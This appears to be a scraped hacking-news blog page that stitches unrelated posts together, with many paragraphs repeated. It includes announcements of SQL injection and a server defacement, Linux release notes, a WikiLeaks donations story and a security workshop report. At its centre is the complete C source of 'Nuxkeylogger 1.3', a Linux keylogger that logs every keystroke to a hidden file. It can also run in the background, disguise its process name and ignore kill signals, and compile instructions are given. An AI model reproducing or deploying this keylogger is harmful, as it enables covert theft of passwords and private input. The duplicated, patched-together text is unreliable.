Chirag Singh found SQL-i vulnerability on Hazara University of Pakistan
Vulnerable Website:-
Vulnerable Link:-
Chirag Singh found SQL-i vulnerability on Hazara University of Pakistan
Sabayon Linux 6 Core
After the release of Sabayon Linux 6, Fabio Erculiani is proud to announced the immediate availability for download of four Core editions of the Sabayon Linux operating system. Sabayon Linux 6 Core editions are designed for Linux experts and advanced users that want to set up a home server or create their very own operating system, based on Sabayon.
The four newly updated editions of Sabayon Linux 6 are: SpinBase, CoreCDX, ServerBase and OpenVZ. While the SpinBase and ServerBase editions allow users to make Sabayon spins or set up a home server, the CoreCDX edition allows users to easily obtain a minimal graphical environment of Sabayon.
The four newly updated editions of Sabayon Linux 6 are: SpinBase, CoreCDX, ServerBase and OpenVZ. While the SpinBase and ServerBase editions allow users to make Sabayon spins or set up a home server, the CoreCDX edition allows users to easily obtain a minimal graphical environment of Sabayon.
Highlights of Sabayon Linux 6 Core:-
· Linux kernel 2.6.39 optimized for desktop usage;
· Small ISO images that can be booted from CD or USB stick;
· EXT4 filesystem as deafult;
· Support for Btrfs filesystem;
· Ready for Portage and Entropy (allows access to lots of installable apps);
· OpenVZ-enabled, Server-optimized and Vserver-enabled kernels available in the default repositories;
· Entropy Framework 1.0 Alpha 14;
· Easy customizable system after installation (GNOME or KDE SC desktop environments can be installed in no time);
· Fast installation process (guaranteed to take less than 5 minutes).
In order to run the Sabayon Linux Core 6 Edition on your system, make sure that you meet the minimum requirements:
· Intel Pentium Pro, Celeron, AMD K6-2, Pentium II/III or AMD Athlon CPU;
· 128 MB of RAM;
· 2-3 GB of free hard disk space;
· Supported 2D video card;
· a CD reader or USB flash drive.
· Small ISO images that can be booted from CD or USB stick;
· EXT4 filesystem as deafult;
· Support for Btrfs filesystem;
· Ready for Portage and Entropy (allows access to lots of installable apps);
· OpenVZ-enabled, Server-optimized and Vserver-enabled kernels available in the default repositories;
· Entropy Framework 1.0 Alpha 14;
· Easy customizable system after installation (GNOME or KDE SC desktop environments can be installed in no time);
· Fast installation process (guaranteed to take less than 5 minutes).
In order to run the Sabayon Linux Core 6 Edition on your system, make sure that you meet the minimum requirements:
· Intel Pentium Pro, Celeron, AMD K6-2, Pentium II/III or AMD Athlon CPU;
· 128 MB of RAM;
· 2-3 GB of free hard disk space;
· Supported 2D video card;
· a CD reader or USB flash drive.
To Download Sabayon Linux 6, Click HERE
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-Again WikiLeaks Donations Has been Blocked By Icelandic Bank
An Icelandic bank that unknowingly provided a way for WikiLeaks supporters to fund the controversial website best known for publishing classified military and diplomatic websites earlier this week has closed the proverbial loophole, according to Reuters reports.
In a story published Friday, Maria Aspan of the wire service revealed that Valitor had agreed earlier this week to accept payments processed by DataCell, a data hosting service provider and a WikiLeaks supporter. However, bank officials later told Aspan that they had not been informed that the transactions would include donations to the Julian Assange owned website.
Credit giants Visa and MasterCard have banned DataCell from processing such donations for months, and on Friday, Valitor spokeswoman Jonina Ingvadottir sent an emailed statement to Reuters stating that the bank "was not informed that DataCell would be conducting these activities when their business agreement was made," and another source told Aspan that Valitor had "blocked the Visa and MasterCard WikiLeaks donations and terminated its contract with DataCell" earlier in the day.
That source told Reuters that less than 100 donations were processed before the agreement was terminated.
"The failed Valitor partnership is the latest blow to Assange, who has struggled to gain funding since the major payments networks stopped processing payments to WikiLeaks," Aspan wrote.
"The Internet vigilante group Anonymous temporarily shut down the public websites of both Visa and MasterCard in December after the companies began their embargo."
She added that Olaf Sigurvinsson, the founder of DataCell, "confirmed that Valitor had terminated the contract with his company" and that when the contract was signed, he had made it "absolutely clear" to the Icelandic financial institution that the company would "continue… to collect donations" for various organizations, including WikiLeaks.
On a special page dedicated solely to donations, Sigurvinsson's company posted a statement in which they said, "DataCell advocates free speech and jurisdiction independence. We plead the public support for the independence of media and jurisdiction; and to bring truth, integrity, dignity and justice to the world… You can help by donating financially to the following organizations."
Further down on the page is a form which individuals can donate by credit card to WikiLeaks.
In addition, the web page claims that, "DataCell is taking on legal case against Visa and MasterCard for suspending its account, for which DataCell was processing credit card donation for WikiLeaks. Please contribute to DataCell legal fund to support in its legal battle against credit card giants for their unjustified and prejudicial action."
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-In a story published Friday, Maria Aspan of the wire service revealed that Valitor had agreed earlier this week to accept payments processed by DataCell, a data hosting service provider and a WikiLeaks supporter. However, bank officials later told Aspan that they had not been informed that the transactions would include donations to the Julian Assange owned website.
Credit giants Visa and MasterCard have banned DataCell from processing such donations for months, and on Friday, Valitor spokeswoman Jonina Ingvadottir sent an emailed statement to Reuters stating that the bank "was not informed that DataCell would be conducting these activities when their business agreement was made," and another source told Aspan that Valitor had "blocked the Visa and MasterCard WikiLeaks donations and terminated its contract with DataCell" earlier in the day.
That source told Reuters that less than 100 donations were processed before the agreement was terminated.
"The failed Valitor partnership is the latest blow to Assange, who has struggled to gain funding since the major payments networks stopped processing payments to WikiLeaks," Aspan wrote.
"The Internet vigilante group Anonymous temporarily shut down the public websites of both Visa and MasterCard in December after the companies began their embargo."
She added that Olaf Sigurvinsson, the founder of DataCell, "confirmed that Valitor had terminated the contract with his company" and that when the contract was signed, he had made it "absolutely clear" to the Icelandic financial institution that the company would "continue… to collect donations" for various organizations, including WikiLeaks.
On a special page dedicated solely to donations, Sigurvinsson's company posted a statement in which they said, "DataCell advocates free speech and jurisdiction independence. We plead the public support for the independence of media and jurisdiction; and to bring truth, integrity, dignity and justice to the world… You can help by donating financially to the following organizations."
Further down on the page is a form which individuals can donate by credit card to WikiLeaks.
In addition, the web page claims that, "DataCell is taking on legal case against Visa and MasterCard for suspending its account, for which DataCell was processing credit card donation for WikiLeaks. Please contribute to DataCell legal fund to support in its legal battle against credit card giants for their unjustified and prejudicial action."
technotimeshop's Server Hacked by Minhal Mehdi
technotimeshop's Server Hacked by Minhal Mehdi
Hacked Sites:-
Mirror Links:-
http://mirror.sec-t.net/
NUXKEYLOGGER VERSION 1.3 (Key Logger For LINUX)
NUXKEYLOGGER VERSION 1.3 is an effective Key Logger For LINUX systems.
Nux Keylogger monitors keyboard activity on a Linux system. It's possible to hide and daemonize this process and it supports azerty and qwerty keyboard modes.
Author:- Vilmain Nicolas (C) 2010, 2011 (null.sim@gmail.com)
Licence:-
This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
Source Code of Nuxkeylogger Version 1.3:-
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <dirent.h>
#include <sys/select.h>
#include <linux/input.h>
#define DF_PATH_LOG "/tmp/.Xsys"
#define PATH_KEYBOARD_FILE "/dev/input/by-path/"
#define VERSION_STR "nuxkeylogger version 1.3"
#define PATH_LEN 1024
#define SIZE_TAB_KEY_AZERTY sizeof (tab_key_azerty)
#define SIZE_TAB_KEY_QWERTY sizeof (tab_key_qwerty)
struct fdlist_s
{
int *fdtab;
int n;
int *p_lastfd;
int fdlog;
};
void checkuid (void);
void decode_nuxkeylogger_options (int argc, char **argv, char **pathlog);
void version (void);
void usage (void);
void out_memory (const char *type);
char * xstrdup (const char *str);
void hide (int argc, char **argv, const char *name);
void block_signal (void);
void daemonize (void);
int get_keyboard_fd (struct fdlist_s *fl);
int open_fd_log (char *pathlog, int *fd);
void loop_keyboard_key (struct fdlist_s *fl);
int write_key (int fd, int fdlog);
void free_fdlist (struct fdlist_s *fl);
static const char *tab_key_azerty[] =
{
"<ESC>", "&", "é", "\"", "'", "(", "-", "è", "_",
"ç", "à ", ")", "=", "<BACKSPACE>", "<TAB>", "a",
"z", "e", "r", "t", "y", "u", "i", "o","p", "^",
"$", "<ENTER>\n", "<CTRL>", "q", "s", "d", "f", "g", "h",
"j", "k", "l", "m", "ù", "²", "<SHIFT>", "*", "w",
"x", "c", "v", "b", "n", ",", ";", ":", "!", "<SHIFT>",
"*", "<ALT>", " ", "", "<F1>", "<F2>", "<F4>",
"<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>", "",
"<VerNum>", "", "7", "8", "9", "-", "4", "5", "6",
"+", "1", "2", "3", "0", "<?>", "", "", "<", "<F11>",
"<F12>", "", "", "", "", "", "", "", "", "", "/", "",
"<ALTGr>", "", "", "<Up>", "<UP>", "<Left>", "<Right>",
"<END>", "<Down>", "<DOWN>", "", "<DEL>", "", "", "",
"", "", "", "", "", "", "", "", "", "", "<META>"
};
static const char *tab_key_qwerty[] =
{
"<ESC>", "!", "@", "#", "$", "%", "^", "&", "*",
"(", ")", "_", "=", "<BACKSPACE>", "<TAB>", "q",
"w", "e", "r", "t", "y", "u", "i", "o", "p",
"[", "]", "<ENTER>\n", "<CTRL-LEFT>", "a", "s", "d",
"f", "g", "h", "j", "k", "l", ";", "'", "`", "",
"\\", "z", "x", "c", "v", "b", "n", "m", ",", "",
"", "", "", "ALT", " ", "", "<F1>", "<F2>", "<F3>",
"<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
"", "", "7","8", "9", "-", "4", "5", "6", "+", "1", "2",
"3", "0", ".", "", "", "<", "<F11>", "<F12>", "", "",
"", "", "", "", "", "<ENTER-RIGHT>", "<CTRL-RIGHT>", "",
"", "<AltGR>", "", "", "<Up>", "", "<LEFT>", "", "<RIGHT>",
"", "<DOWN>", "", "", "", "", "", "", "", ""
};
char **tab_key;
int
main (int argc, char **argv)
{
struct fdlist_s fl;
char *pathlog = NULL;
checkuid ();
memset (&fl, 0, sizeof (struct fdlist_s));
fl.fdlog = -1;
tab_key = (char **) tab_key_azerty;
decode_nuxkeylogger_options (argc, argv, &pathlog);
if (get_keyboard_fd (&fl)
|| open_fd_log (pathlog, &fl.fdlog) == -1)
{
free_fdlist (&fl);
return EXIT_FAILURE;
}
loop_keyboard_key (&fl);
free_fdlist (&fl);
return EXIT_SUCCESS;
}
void
checkuid (void)
{
if (getuid ())
{
fprintf (stderr, "WARNING: need root!\n");
exit (EXIT_SUCCESS);
}
}
void
decode_nuxkeylogger_options (int argc, char **argv, char **pathlog)
{
char opt;
char *name = NULL;
static struct option const long_options[] =
{
{"help", no_argument, 0, 'h'},
{"version", no_argument, 0, 'v'},
{"daemonize", no_argument, 0, 'd'},
{"block-signals", no_argument, 0, 's'},
{"mode-qwerty", no_argument, 0, 'Q'},
{"mode-azerty", no_argument, 0, 'A'},
{"hidden", required_argument, 0, 'i'},
{"path-log", required_argument, 0, 'p'},
{0, 0, 0, 0}
};
do
{
opt = getopt_long (argc, argv, "hvdsAQi:p:", long_options, NULL);
switch (opt)
{
case 'h':
usage ();
break;
case 'v':
version ();
break;
case 'i':
name = argv[optind - 1];
break;
case 'd':
daemonize ();
break;
case 's':
block_signal ();
break;
case 'A':
tab_key = (char **) tab_key_azerty;
break;
case 'Q':
tab_key = (char **) tab_key_qwerty;
break;
case 'p':
*pathlog = xstrdup (optarg);
break;
}
}
while (opt != -1);
if (name)
hide (argc, argv, name);
}
void
version (void)
{
puts (VERSION_STR);
exit (EXIT_SUCCESS);
}
void
usage (void)
{
printf ("Warning, in \"qwerty\" mode, it's possibility to error key-mapp\n"
"arguments list:\n\r"
" -H, --help print usage and exit program\n\r"
" -V, --version print program_version and exit\r\n"
" -d, --daemonize exec program in background\r\n"
" -s, --block-signal block all signal\r\n"
" -Q, --mode-qwerty keyboard in qwerty mode\r\n"
" -A, --mode-azerty keyboard in azerty mode"
"(by default)\r\n"
" -i, --hidden [NEW NAME] change program name\r\n"
" -p, --path-log [PATH] name for output log file\r\n");
exit (EXIT_SUCCESS);
}
void
out_memory (const char *type)
{
fprintf (stderr, "%s: memory exhausted\n", type);
exit (EXIT_FAILURE);
}
char *
xstrdup (const char *str)
{
char *copy = NULL;
copy = strdup (str);
if (!copy)
out_memory ("strdup");
return copy;
}
void
hide (int argc, char **argv, const char *name)
{
char *newname = NULL;
newname = xstrdup (name);
for (; argc; argc--)
memset (argv[argc - 1], 0, strlen (argv[argc - 1]));
strcpy (argv[0], newname);
free (newname);
}
void
block_signal (void)
{
int *p_sig = NULL;
static const int sigtab[] =
{
SIGUSR1, SIGUSR2, SIGINT, SIGPIPE, SIGQUIT,
SIGTERM, SIGTSTP, SIGHUP, SIGILL, SIGABRT,
SIGFPE, SIGSEGV, SIGALRM, SIGCHLD, SIGCONT,
SIGTTIN, SIGTTOU, 0
};
p_sig = (int *) sigtab;
do
signal (*p_sig, SIG_IGN);
while (*++p_sig);
}
void
daemonize (void)
{
pid_t pid;
pid = fork ();
if (pid == -1)
{
perror ("fork");
exit (EXIT_FAILURE);
}
else if (pid)
exit (EXIT_SUCCESS);
}
int
get_keyboard_fd (struct fdlist_s *fl)
{
struct dirent *ent = NULL;
DIR *dir = NULL;
char path[PATH_LEN];
dir = opendir (PATH_KEYBOARD_FILE);
if (!dir)
{
fprintf (stderr, "opendir: %s\n", strerror (errno));
return -1;
}
for (;;)
{
ent = readdir (dir);
if (!ent)
break;
if (strstr(ent->d_name, "-kbd"))
{
memset (path, 0, PATH_LEN);
snprintf (path, (PATH_LEN - 1), "%s%s",
PATH_KEYBOARD_FILE, ent->d_name);
fl->n++;
fl->fdtab = realloc (fl->fdtab, (fl->n * sizeof (int)));
fl->fdtab[fl->n - 1] = open (path, O_RDONLY);
if (fl->fdtab[fl->n - 1] == -1)
{
fprintf (stderr, "open(%s): %s", path, strerror (errno));
closedir (dir);
return -1;
}
}
}
closedir (dir);
fl->p_lastfd = &fl->fdtab[fl->n - 1];
return 0;
}
int
open_fd_log (char *pathlog, int *fd)
{
char *p_log = NULL;
p_log = (pathlog) ? pathlog : DF_PATH_LOG;
*fd = open (p_log, O_WRONLY | O_CREAT | O_APPEND);
if (*fd == -1)
fprintf (stderr, "open(%s): %s\n", p_log, strerror (errno));
if (pathlog)
free (pathlog);
return *fd;
}
void
free_fdlist (struct fdlist_s *fl)
{
int i;
if (fl->fdtab)
{
for (i = 0; i < fl->n; i++)
{
if (fl->fdtab[i] != -1)
close (fl->fdtab[i]);
}
free (fl->fdtab);
}
if (fl->fdlog != -1)
close (fl->fdlog);
}
void
loop_keyboard_key (struct fdlist_s *fl)
{
int n;
int ret;
fd_set setread;
for (;;)
{
FD_ZERO (&setread);
for (n = 0; n < fl->n; n++)
FD_SET (fl->fdtab[n], &setread);
ret = select (*fl->p_lastfd + 1, &setread, NULL, NULL, NULL);
if (ret == -1)
return;
else if (ret)
{
for (n = 0; n < fl->n; n++)
if (FD_ISSET (fl->fdtab[n], &setread))
{
if (write_key (fl->fdtab[n], fl->fdlog) == -1)
return;
}
}
}
}
int
write_key (int fd, int fdlog)
{
struct input_event ev;
char *key = NULL;
if (read(fd, &ev, sizeof(struct input_event))
== sizeof(struct input_event))
{
if ((ev.value == EV_KEY || ev.value == 2)
&& (ev.code - 1) > -1 && (ev.code - 1) < 118)
{
key = tab_key[ev.code - 1];
if (write (fdlog, key, strlen (key)) == -1)
return -1;
}
}
return 0;
}
For Installation:-
$ gcc -o nuxkeylogger nuxkeylogger.c -W -Wall
# ./nuxkeylogger --help
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-Cyber Security Workshop on IIT Kanpur
Youths should be aware of ways to protect their Internet identity as the threat of breach of privacy is increasing and more and more incidents of breach are being reported, experts from IIT Kanpur said here on Saturday.
The Internet security experts, which included Gaurav Sharma and Tarun Bansal, were addressing students and professionals at a seminar at Bharti Mandapam here.
The Internet security experts, which included Gaurav Sharma and Tarun Bansal, were addressing students and professionals at a seminar at Bharti Mandapam here.
"As more and more companies are going online, as more and more data is being stored on the Internet, and netbanking is drawing a rising number of people, the demand of Internet security experts is growing," Gaurav said, adding like in western countries, domestic companies are ready to pay a hefty pay to experts in this field. After recent incidents of Internet data theft from companies and other agencies, both government agencies and private companies are extremely conscious about their online safety, Gaurav added.
"Always have an eye for suspicious activity on your online existence. Most of the time hackers create a duplicate website and as soon as you provide your log in address on it, your site is hacked," said Gaurav. Tarun Bansal, another IIT Kanpur student, warned Internet users against Internet security loopholes.
Organized under the aegis of a web portal, allmycourses.com, the workshop witnessed a focused and holistic discussions on various forms of hacking.
"Always sign out from your account after use. If you close down your window without successfully logging out, the web browser stores your login information which could be used by hackers to tamper with your account," Tarun told students.
"One of the important things to keep in mind is to always delete browsing history whenever you use a public computer because cookies, which form automatically as you open a site, could provide a way to hackers to get to your login information. However, it is not necessary with private computers," Tarun further added.
One more thing to keep in mind is to always check for the right URL before logging in, wrong URLs (like www.facabook.com in place of www.facebook.com) are also dangerous, Tarun informed students.
An IIT-Kanpur student and group coordinator, Girijesh Jha, said: "Students right from class IX to degree students along with many professionals attended the workshop." The experts also took questions from the audience. The workshop will also continue on Sunday
"Always have an eye for suspicious activity on your online existence. Most of the time hackers create a duplicate website and as soon as you provide your log in address on it, your site is hacked," said Gaurav. Tarun Bansal, another IIT Kanpur student, warned Internet users against Internet security loopholes.
Organized under the aegis of a web portal, allmycourses.com, the workshop witnessed a focused and holistic discussions on various forms of hacking.
"Always sign out from your account after use. If you close down your window without successfully logging out, the web browser stores your login information which could be used by hackers to tamper with your account," Tarun told students.
"One of the important things to keep in mind is to always delete browsing history whenever you use a public computer because cookies, which form automatically as you open a site, could provide a way to hackers to get to your login information. However, it is not necessary with private computers," Tarun further added.
One more thing to keep in mind is to always check for the right URL before logging in, wrong URLs (like www.facabook.com in place of www.facebook.com) are also dangerous, Tarun informed students.
An IIT-Kanpur student and group coordinator, Girijesh Jha, said: "Students right from class IX to degree students along with many professionals attended the workshop." The experts also took questions from the audience. The workshop will also continue on Sunday
-News Source (TOI)
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-Ubuntu 11.10 Alpha 2 Released
Commercial Ubuntu distributor Canonical has released the second alpha version of the Ubuntu 11.10 ‘Oneiric Ocelot’ for testing. The upcoming Ubuntu platform comes with the new Linux Kernel 3.0 and the controversial Unity Desktop platform replacing the good old Gnome desktop. However, users can switch to Gnome 3 desktop if they want to.
In the new OS, the Gnome Display Manager has been replaced by the LightDM platform as the display and login screen manager, Tech Eye informs, while the Déjà Dup back-up tool comes with the operating system. Another major change in Ubuntu is that the Evolution email client will be replaced by Mozilla Thunderbird. Speaking of Mozilla, Canonical had planned to replace the Firefox browser as the default web browser in Ubuntu with Google Chrome, a move which will take effect in a matter of years.
The alpha version also comes with Firefox 5, VLC Media Player version 1.1.10 and Mesa 7.11 as some of the pre-installed tools.
Canonical plans to release another alpha version for developers and early adopters, followed by two beta versions before it actually releases the software for the general public.
SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
